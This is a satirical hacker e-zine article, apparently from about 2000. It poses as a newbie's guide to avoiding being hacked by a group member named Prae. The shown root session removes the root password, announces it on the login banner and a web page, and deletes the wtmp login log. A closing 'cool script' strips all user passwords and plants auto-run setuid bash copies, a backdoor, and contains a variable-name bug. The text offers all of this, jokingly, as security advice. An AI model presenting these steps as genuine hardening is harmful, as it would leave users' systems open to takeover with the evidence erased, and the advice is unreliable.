b0g!#@! Magazine

[home] [<-back] [index] [next->]



 ____________________________________________________________________
 
[13:. - [ How to NOT get owned by Prae ]                 [timidu] :. ]
                                                 [timidu@b0g.org] :. ]
 ____________________________________________________________________









"-My fucking GOD! I've been hacked by Prae!@#$@#$# ! I wanna kill
myself ! >:/"
You can hear that pretty often these days as Prae is an 31337 h4x0r
and he'll root you in just a second.
This guide is meant to help Linux and Internet newbies to avoid not
getting hacked by this hack-est , the Emperor of the Hackers , the guy
that can root you with only a spoon and a peach-leaf , his Majesty
Prae from b0g. Here is a log with what I do every time I reinstall
Linux on my box that was NEVER hacked by Prae (and will never be as I
IRC spoofed cuz Im lame)
Following these lines step by step will totally secure you and Prae
won't , for sure , root you.



Mandrake Linux release 7.0 (Air)
Kernel 2.4.0-test2 on a i386

sekurebox login: root
Password:
Last login: Sun Jun 25 20:07:24 on tty4
You have mail.
[root@sekurebox /root]# passwd -d root
Changing password for user root
Removing password for user root
passwd: Success
[root@sekurebox /root]# echo 'Enter root login and enjoy!@@#$@' >
/etc/issue.net
[root@sekurebox /root]# echo 'Enter root login and enjoy!@@#$@' >
/etc/issue
[root@sekurebox /root]# logout

Enter root login and enjoy!@#@#$
sekurebox login: root
Last login: Tue Jun 27 16:43:54 on tty1
You have mail.
[root@sekurebox /root]# echo 'This box has no root password set
'
>> /home/httpd/html/index.htm
[root@sekurebox /root]# echo 'This box has no root password set
'
>> /home/httpd/html/index.htm
[root@sekurebox /root]# echo 'This box has no root password set
'
>> /home/httpd/html/index.htm
[root@sekurebox /root]# echo 'This box has no root password set' >>
/home/httpd/html/index.htm
[root@sekurebox /root]# mail -s "Telnet over here" prae@b0g.org
hey .. check out my box man
Cc: ^D[root@sekurebox /root]#
[root@sekurebox /root]# BitchX -c #k-rad -n TelnetMe
toronto.on.ca.undernet.org&
[1] 764
[root@sekurebox /root]# BitchX - Based on EPIC Software Labs epic
ircII
(1998).
Version (BitchX-1.0c16) -- Date (19990221).
Process [764]
Using terminal type [linux]


[1]+  Stopped (tty output)    BitchX -c #k-rad -n TelnetMe
toronto.on.ca.undernet.org
[root@sekurebox /root]# rm -f /var/log/wtmp
[root@sekurebox /root]# touch /var/log/wtmp
[root@sekurebox /root]# last root

wtmp begins Tue Jun 27 19:07:27 2000
[root@sekurebox /root]# sleep 360000


Meanwhile .. on Prae's box

[root@PraeScilla /root]#
Message from mom@kitchen on tty4 at 19:10 ...
Prae , pumpkin , it's dinner time
EOF

[root@PraeScilla /root]# echo "But Im not hungry , mommy!" | write
mom
[root@PraeScilla /root]#
Message from mom@kitchen on tty4 at 19:14 ...
Hmm .. I thought you learnt your lesson the other day when I hit you
with the brand new whip that i've purchased
EOF
[root@PraeScilla /root]# echo "Ok , mom , pls not the whip again , Im
comin' in 5 mins ; just lemme read my e-mails" | write mom

[root@PraeScilla /root]# ssh -l prae b0g.org
prae@b0g.org's password:            (what could it be?)
Last login: XXXXXXXXXXXXXXXXX
You have new mail.

[prae@b0g ~]$ cat $MAIL


>From root@sekurebox.net  Tue Jun 27 16:50:58 2000
Return-Path: 
Received: (from root@sekurebox.net)
        by sekurebox.net (8.9.3/8.9.3) id QAA00740
        for prae@b0g.org; Tue, 27 Jun 2000 16:50:58 -0400
Date: Tue, 27 Jun 2000 16:50:58 -0400
From: root 
Message-Id: <200006272050.QAA00740@sekurebox.net>
To: prae@b0g.org
Subject: Telnet over here
Status: RO
X-Status:
X-Keywords:
X-UID: 2

hey .. check out my box man

[prae@b0g ~]$ HaHaHaH .. I ROOT YOUR BOX .. YOU LAMER!#$@$%@%$
bash: HaHaHaH: command not found
[prae@b0g ~]$ 8u7 Wh47 7H3 fuq 15 7h15 b0x
bash: 8u7: command not found
[prae@b0g ~]$ cat $MAIL | grep 'Subject' | awk -F':' '{print $2}'
 Telnet over here

[prae@b0g ~]$ ahhhh
bash: ahhhh: command not found
[prae@b0g ~]$ telnet
telnet> over here
?Invalid command
telnet> open over here
over: Host name lookup failure
telnet> quit
[prae@b0g ~]$ BOY , I SUCK!!!!!!!!!!! :((((((((((
BOY , I SUCK!!!!!! :((((((((((
bash: syntax error near unexpected token `:(('
[prae@b0g ~]$ logout

[root@PraeScilla /root]# su learntime
[learntime@PraeScilla ~]$ mesg n
[learntime@PraeScilla ~]$ less `locate script-kiddy-HOWTO` && lynx
www.antionline.com && lynx www.2600.org && BitchX -c #hack
toronto.on.ca.undernet.org
[learntime@PraeScilla ~]$ su -
Password:
[root@PraeScilla /root]#
[root@PraeScilla /root]#
[root@PraeScilla /root]#
[root@PraeScilla /root]# /sbin/lilo -D=dos
[root@PraeScilla /root]# adios , dear Linux , but Im too lame to use
you
>
[root@PraeScilla /root]# reboot


This won't really happen (at least Im not sure for it) but you can
check yer logz that Prae didn't penetrate you (your system , I mean ,
I don't know if he actually penetrated you ;)


[root@sekurebox /root]# last root

wtmp begins Tue Jun 27 19:07:27 2000

See? You're totally safe!@#$@ Thank me! Praise me! Cherish me!@#$@#



These are just a few methods of protecting yourself. You can increase
security in many ways ....
I usually make this cool script
--- cut here ---
#!/bin/bash
for I in `cat /etc/passwd | awk -F':' '{print $1}'`
do
passwd -d $I
cp /bin/bash /home/$i
chmod a+s /home/$i/bash
echo "./bash" >> /home/$i/.bash_profile
done
--- stop cutting ---



If you find this guide useful then Ill continue releasing these
invaluable advises that every admin should follow





b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
[^-top] [next->]